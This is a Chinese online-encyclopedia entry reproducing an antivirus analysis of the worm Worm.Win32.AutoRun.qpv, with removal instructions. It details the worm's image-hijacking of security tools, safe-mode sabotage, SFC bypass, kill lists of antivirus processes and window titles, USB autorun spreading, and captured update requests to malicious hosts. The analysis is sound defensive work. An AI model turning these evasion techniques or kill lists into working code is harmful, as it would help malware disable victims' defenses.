| 词条 | Worm.Win32.AutoRun.qpv |
| 释义 | 病毒标签病毒名称: Worm.Win32.AutoRun.qpv 病毒类型: 蠕虫 文件 MD5: 3166743046C030B5E597E5FAE755C33F 公开范围: 完全公开 危害等级: 4 文件长度: 20,560 字节 感染系统: Windows98以上版本 开发工具: Microsoft Visual C++ 6.0 病毒描述该病毒是蠕虫,病毒的图标为windows自动更新程序,诱骗用户点击运行。病毒运行后,隐藏自身,破坏系统正常SFC功能,更改系统文件操作权限、删除系统文件、并用病毒文件替换正常的系统更新程序。病毒遍历进程列表,搜索并结束对其自身存在构成威胁的进程,隐藏打开Internet Explorer,通过远程写入在IE进程中创建病毒线程。病毒修改注册表启动项,达到开机自启动的目的、添加映像劫持项,使众多安全工具无法启动。病毒在各磁盘分区创建autorun.inf文件和病毒副本文件way.pif文件,达到自启动和U盘传播的目的。病毒检测当前鼠标位置的窗口是否含有对病毒有危险的信息,当出现病毒认为威胁它存在的信息是关闭此窗口。病毒连接网络更新自身,下载并运行大量其他病毒。 行为分析本地行为 1、文件运行后生成以下文件 病毒替换的文件: %System32%\\dllcache\\wuauclt.exe 20,560 字节 %System32%\\wuauclt.exe 20,560 字节 病毒衍生的文件: %System32%\\dmdskmgrs.dll 594,432 字节 %DriveLetter%\\WAY.PIF 20,560 字节 %DriveLetter%\\AUTORUN.INF 147 字节 %HomeDrive%\\WAY.PIF 20,560 字节 %HomeDrive%\\AUTORUN.INF 147 字节 系统原文件备份: %DriveLetter%\\tEM.tep 108,032 字节 2、修改注册表 添加注册表项目: [HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options] 项:360rpt.EXE 值:c:\\windows\\system32\\dllcache\\wuauclt.exe 描述:映像劫持。 [HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options] 项:360safe.EXE 值:c:\\windows\\system32\\dllcache\\wuauclt.exe 描述:映像劫持。 注:被映像劫持的程序有"360Safe.exe"、"360tray.exe"、"360rpt.EXE"、"Runiep.exe"、"RAv.exe"、"RSTray.exe"、"CCenter.EXE"、"RAVMON.EXE"、"RAVMOND.EXE"、"GuardField.exe"、"Ravxp.exe"、"GFUpd.exe"、"kmailmon.exe"、"kavstart.exe"、"KAVPFW.EXE"、"kwatch.exe"、"sharedaccess"、"McShield"、"KWhatchsvc"、"KPfwSvc"、"Symantec AntiVirus"、"Symantec AntiVirus Drivers Services"、"Symantec AntiVirus Definition Watcher"、"Norton AntiVirus Server"、"UpdaterUI.exe"、"rfwsrv.exe"、"rfwProxy.exe"、"rfwstub.exe"、"RavStub.exe"、"rfwmain.exe"、"rfwmain.exe"、"TBMon.exe"、"nod32kui.exe"、"nod32krn.exe"、"KASARP.exe"、"FrameworkService.exe"、"scan32.exe"、"VPC32.exe"、"VPTRAY.exe"、"AntiArp.exe"、"KRegEx.exe"、"KvXP.kxp"、"kvsrvxp.kxp"、"kvsrvxp.exe"、"KVWSC.EXE"、"Iparmor.exe"、"Avp.EXE"、"VsTskMgr.exe"、"EsuSafeguard.exe",在此不赘述。 [HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run] 项:internetnet 值:c:\\windows\\system32\\wuauclt.exe 描述:自启动项 删除注册表项目: [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SafeBoot\\Minimal\\ {4D36E967-E325-11CE-BFC1-08002BE10318}\\@] 键值: 字符串: "DiskDrive" [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SafeBoot\etwork\\ {4D36E967-E325-11CE-BFC1-08002BE10318}\\@] 键值: 字符串: "DiskDrive" [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\ {4D36E967-E325-11CE-BFC1-08002BE10318}\\@] 键值: 字符串: "DiskDrive" [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\etwork\\ {4D36E967-E325-11CE-BFC1-08002BE10318}\\@] 键值: 字符串: "DiskDrive" 描述:禁止进入安全模式,进入安全模式蓝屏。 3、破坏系统正常的SFC功能,更改系统文件操作权限。 病毒通过加载系统动态链接库sfc_os.dll,调用当中的函数,利用这些函数修改系统的文件合法性检测,使其在用病毒文件替换系统文件时windows不会提示系统文件被更改。 病毒通过通过cacls.exe命令更改以下文件访问控制权: "c:\\windows\\system32\\packet.dll" "c:\\windows\\system32\\pthreadVC.dll" "c:\\windows\\system32\\wpcap.dll" "c:\\windows\\system32\\drivers\pf.sys" "c:\\windows\\system32\pptools.dll " "c:\\windows\\system32\\drivers\\acpidisk.sys" "c:\\windows\\system32\\wanpacket.dll" 更改为对所有用户为完全控制。 注:SFC(系统文件检查器,这个工具在WIN3.X时代开始集成于微软操作系统,并正式出现在Windows 98下,它可以扫描所有受保护的系统文件验证系统文件完整性并用正确的Microsoft程序版本替换不正确的版本) 4、病毒企图躲避卡巴斯基的主动防御功能 病毒用更改系统时间和替换系统驱动躲避卡巴斯基的主动防御。 病毒通过加载其释放的驱动程序beep.sys(替换系统中原有的文件)来重置系统的ssdt来关闭卡巴的主动防御。 5、遍历进程列表结束进程 病毒遍历系统进程列表当发现以下进程是结束该进程。 "360Safe.exe"、"360tray.exe"、"360rpt.EXE"、"Runiep.exe"、"RAv.exe"、"RSTray.exe"、 "CCenter.EXE"、"RAVMON.EXE"、"RAVMOND.EXE"、"GuardField.exe"、"Ravxp.exe"、"GFUpd.exe"、 "kmailmon.exe"、"kavstart.exe"、"KAVPFW.EXE"、"kwatch.exe"、"sharedaccess"、"McShield"、 "KWhatchsvc"、"KPfwSvc"、"Symantec AntiVirus"、"Symantec AntiVirus Drivers Services"、 "Symantec AntiVirus Definition Watcher"、"Norton AntiVirus Server"、"UpdaterUI.exe"、 "rfwsrv.exe"、"rfwProxy.exe"、"rfwstub.exe"、"RavStub.exe"、"rfwmain.exe"、"rfwmain.exe"、 "TBMon.exe"、"nod32kui.exe"、"nod32krn.exe"、"KASARP.exe"、"FrameworkService.exe"、"scan32.exe"、 "VPC32.exe"、"VPTRAY.exe"、"AntiArp.exe"、"KRegEx.exe"、"KvXP.kxp"、"kvsrvxp.kxp"、"kvsrvxp.exe"、 "KVWSC.EXE"、"Iparmor.exe"、"Avp.EXE"、"VsTskMgr.exe"、"EsuSafeguard.exe" 这些其中包含各大杀毒软件的进程和系统自动更新进程。 6、在各盘符创建autorun.inf文件和病毒副本 病毒在各磁盘分区下创建autorun.inf文件和病毒副本文件,将autorun.inf中的打开命令和资源管理器命令指向为该磁盘分区的病毒副本文件。从而使用户打开磁盘分区时附带运行该病毒文件。还可以达到U盘传播的目的。 7、获得窗口句柄结束窗口 病毒利用api函数获取当前鼠标所在位置,获得该位置窗口句柄。若发现该窗口题栏文本中含有以下字符串,关闭该窗口。 "卫士"、"杀"、"NOD32"、"process"、"BD"、"瑞星"、"木马"、"绿鹰"、"点"、"Mcafee"、"检"、"Firewall"、"Virus"、"antiy"、"民"、"worm"、"SREng"、"清理"。 8、病毒循环检测 病毒通过一个死循环不断的执行5,6两个步骤。当发现病毒文件被删除时就会重新创建该文件。 网络行为 1、 病毒连接网络地址: x.c***.com update.heis****.cn update.cpus****.com CSC3-2004-crl.veri****.com crl.verisign.com 2、 下载并运行大量其他病毒。 2[1].exe not-a-virus:AdWare.Win32.Cinmus.vmz 9[1].exe Trojan-GameThief.Win32.OnLineGames.tptg 1[1].exe Trojan-Downloader.Win32.Zlob.abgq 6[1].exe Trojan.Win32.Pakes.ljf x[1].gif Worm.Win32.AutoRun.rjz 5[1].exe Trojan-Downloader.Win32.Agent.aksm xx[1].exe 原病毒程序更新文件 3[1].exe Trojan-Downloader.Win32.Delf.epw 10[1].exe 网站排名工具条(广告件) 3、下载的病毒运行时的衍生文件 %System32%\\drivers\pf.sys %System32%\\dllcache\\wuauclt.exe %System32%\\dllcache\pptools.dll %System32%\\OLDE.tmp %System32%\\dmdskmgrs.dll %System32%\\htxvimes.dll %System32%\\lsaes.exe %System32%\\WanPacket.dll %System32%\\Packet.dll %System32%\\wpcap.dll %System32%\\wacclt.exe %System32%\\wuauclt.exe %System32%\pptools.dll %System32%\\mprmsgse.axz %System32%\\dkmdskmgrs.dll %Windir%\\Kler\\pbhealth.dll %Windir%\\LastGood\\system32\pptools.dll %HomeDrive%\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\3.pif 桌面\\A.PIF %HomeDrive%\\Documents and Settings\\2.pif %HomeDrive%\\Documents and Settings\\3.pif %HomeDrive%\\Documents and Settings\\6.pif %HomeDrive%\\Documents and Settings\\9.pif %HomeDrive%\\Documents and Settings\\10.pif %ProgramFiles%\\Common Files\\PushWare\\Uninst.exe %ProgramFiles%\\Common Files\\PushWare\\cpush.dll %ProgramFiles%\\eff.pif %ProgramFiles%\\zzToolBar\\IP.dat %ProgramFiles%\\zzToolBar\\SearchEngineConfig %ProgramFiles%\\zzToolBar\\Uninstall.exe %ProgramFiles%\\zzToolBar\\uISGRLFile.dat %ProgramFiles%\\zzToolBar\\ToolBand.dll %ProgramFiles%\\zzToolBar\\Toolbar_bho.dll %HomeDrive%\\tEM.tep 注:由于此文件为病毒更新程序产生,此时system32目录下的wuauclt.exe已经是病毒,所以这个备份也是病毒。 %HomeDrive%\\h.pif %HomeDrive%\\tttmm.tep %HomeDrive%\\HVVP.PIF 4、 病毒更新所发数据包 a. GET /adsys/rankstat.htm?Install_stat&AgentID=-33554375&Uid=00000000000000000001$$00-0C-29-9D-6E-C3&Auth=D97A0C6F8EA1ED38 HTTP/1.1 User-Agent: ProxyDown Host: update.heishatu.cn Cache-Control: no-cache HTTP/1.0 200 OK Content-Length: 21 Content-Type: text/html Last-Modified: Wed, 23 May 2007 03:37:12 GMT Accept-Ranges: bytes ETag: "a24084a6eb9cc71:711" X-Powered-By: ASP.NET Server: Microsoft-IIS/4.0 Date: Tue, 28 Oct 2008 02:12:33 GMT X-Cache: MISS from localhost Connection: close ok b. GET /cpush/version.txt HTTP/1.1 User-Agent: CPUSH_UPDATER Host: update.cpushpop.com Cache-Control: no-cache HTTP/1.0 200 OK Date: Tue, 28 Oct 2008 02:12:33 GMT Server: Apache/2.2.2 (Fedora) Last-Modified: Tue, 21 Oct 2008 12:02:22 GMT ETag: "f100b7-6d-34404f80" Accept-Ranges: bytes Content-Length: 109 Content-Type: text/plain; charset=UTF-8 X-Cache: MISS from localhost Connection: close [common] version=1,1,0,9 url=http://update.cpus****.com/cpush/cpush.dll md5=7e3d08311b3c954197b4f05f044491c0 c. GET /cpush/version.txt?version=1,1,0,9&uid=5EAF7213-7BE1-48D2-8C99-0020F68BF3FC HTTP/1.1 User-Agent: CPUSH_UPDATER Host: update.cpushpop.com Cache-Control: no-cache HTTP/1.0 200 OK Date: Tue, 28 Oct 2008 02:12:33 GMT Server: Apache/2.2.2 (Fedora) Last-Modified: Tue, 21 Oct 2008 12:02:22 GMT ETag: "f100b7-6d-34404f80" Accept-Ranges: bytes Content-Length: 109 Content-Type: text/plain; charset=UTF-8 X-Cache: MISS from localhost Connection: close [common] version=1,1,0,9 url=http://update.cpus****.com/cpush/cpush.dll md5=7e3d08311b3c954197b4f05f044491c0 病毒简要流程如图: 注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\\Winnt\\System32,windows95/98/me中默认的安装路径是C:\\Windows\\System,windowsXP中默认的安装路径是C:\\Windows\\System32。 %Temp% = C:\\Documents and Settings\\AAAAA\\Local Settings\\Temp 当前用户TEMP缓存变量 %Windir%\\ WINDODWS所在目录 %DriveLetter%\\ 逻辑驱动器根目录 %ProgramFiles%\\ 系统程序默认安装目录 %HomeDrive% = C:\\ 当前启动的系统的所在分区 %Documents and Settings%\\ 当前用户文档根目录 清除方案1、使用安天防线可彻底清除此病毒(推荐)。 2、手工清除请按照行为分析删除对应文件,恢复相关系统设置。 (1) 用Atool结束所有IE进程。 (2) 用Atool强制删除以下所有文件: 病毒原文件 %System32%\\dllcache\\wuauclt.exe %System32%\\wuauclt.exe %System32%\\dmdskmgrs.dll %DriveLetter%\\WAY.PIF %DriveLetter%\\AUTORUN.INF %HomeDrive%\\WAY.PIF %HomeDrive%\\AUTORUN.INF %HomeDrive%\\tEM.tep %System32%\\drivers\pf.sys %System32%\\dllcache\\wuauclt.exe %System32%\\dllcache\pptools.dll %System32%\\OLDE.tmp %System32%\\dmdskmgrs.dll %System32%\\htxvimes.dll %System32%\\lsaes.exe %System32%\\WanPacket.dll %System32%\\Packet.dll %System32%\\wpcap.dll %System32%\\wacclt.exe %System32%\\wuauclt.exe %System32%\pptools.dll %System32%\\mprmsgse.axz %System32%\\dkmdskmgrs.dll %Windir%\\Kler\\pbhealth.dll %Windir%\\LastGood\\system32\pptools.dll %HomeDrive%\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\3.pif 桌面\\A.PIF %HomeDrive%\\Documents and Settings\\2.pif %HomeDrive%\\Documents and Settings\\3.pif %HomeDrive%\\Documents and Settings\\6.pif %HomeDrive%\\Documents and Settings\\9.pif %HomeDrive%\\Documents and Settings\\10.pif %ProgramFiles%\\Common Files\\PushWare\\Uninst.exe %ProgramFiles%\\Common Files\\PushWare\\cpush.dll %ProgramFiles%\\eff.pif %ProgramFiles%\\zzToolBar\\IP.dat %ProgramFiles%\\zzToolBar\\SearchEngineConfig %ProgramFiles%\\zzToolBar\\Uninstall.exe %ProgramFiles%\\zzToolBar\\uISGRLFile.dat %ProgramFiles%\\zzToolBar\\ToolBand.dll %ProgramFiles%\\zzToolBar\\Toolbar_bho.dll %HomeDrive%\\h.pif %HomeDrive%\\tttmm.tep %HomeDrive%\\HVVP.PIF (3) 删除注册表中病毒添加的项 a. 将%Windir%\\regedit.exe更改名称为**.exe。 b. 删除注册表下列各项 [HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options]主键。 [KLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run] 项:internetnet 值:c:\\windows\\system32\\wuauclt.exe [HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects ] 项:CAdLogic Object 值:c:\\program files\\common files\\pushware\\cpush0.dll [HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects ] 项:Info cache 值:c:\\windows\\kler\\pbhealth.dll [HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects ] 项:网站排名工具条BHO网站排名工具条 值:c:\\program files\\zztoolbar\\toolbar_bho.dll [HKLM\\Software\\Microsoft\\Internet Explorer\\Toolbar] 项:toolband.dll 值: c:\\program files\\zztoolbar\\toolband.dll c. 添加下列注册表项 [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318}\\@] 键值: 字符串: "DiskDrive" [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SafeBoot\etwork\\{4D36E967-E325-11CE-BFC1-08002BE10318}\\@] 键值: 字符串: "DiskDrive" [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318}\\@] 键值: 字符串: "DiskDrive" [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\etwork\\{4D36E967-E325-11CE-BFC1-08002BE10318}\\@] 键值: 字符串: "DiskDrive" (4) 恢复原系统文件 从干净的系统中拷贝以下文件: %System32%\\dllcache\\wuauclt.exe %System32%\\wuauclt.exe |
| 随便看 |
百科全书收录4421916条中文百科知识,基本涵盖了大多数领域的百科知识,是一部内容开放、自由的电子版百科全书。